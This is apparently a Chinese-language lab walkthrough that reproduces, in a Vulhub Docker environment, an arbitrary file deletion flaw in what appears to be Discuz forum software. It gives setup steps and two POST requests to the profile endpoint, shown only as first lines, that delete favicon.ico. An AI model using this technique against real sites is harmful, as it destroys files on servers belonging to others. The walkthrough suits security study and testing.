生活葬了童真,物欲脏了灵魂
Vulhub运行报错,因为端口占用了,默认是使用80端口
修改目录下的 docker-compose.yml
文件,前面这个端口号修改为其他空闲端口
docker-compose up -d
运行
访问网站
将 数据库服务器
修改为 db
,设置好账号密码,下一步
安装完成
注册一个用户
在个人资料页 /home.php?mod=spacecp
,找到自己的 formhash
值
带上自己的 Cookie
formhash
值发送如下数据包
1 | POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1 |
尝试删除 favicon.ico
文件
个人资料处的出生地变化 /home.php?mod=spacecp
,说明修改成功
使用如下POC上传任意一个文件,上传后,文件被删除
1 | POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=你的formhash HTTP/1.1 |
文件被删除